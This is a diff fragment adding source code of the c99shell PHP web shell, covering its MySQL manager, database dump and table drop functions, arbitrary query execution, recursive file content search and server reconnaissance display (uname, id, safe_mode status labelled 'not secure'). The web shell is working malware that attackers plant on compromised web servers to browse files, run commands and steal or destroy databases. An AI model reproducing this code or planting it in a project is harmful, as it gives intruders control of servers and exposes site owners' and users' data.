+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return false;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== false)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === false) {$free = 0;}
+ if ($total === false) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = true;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
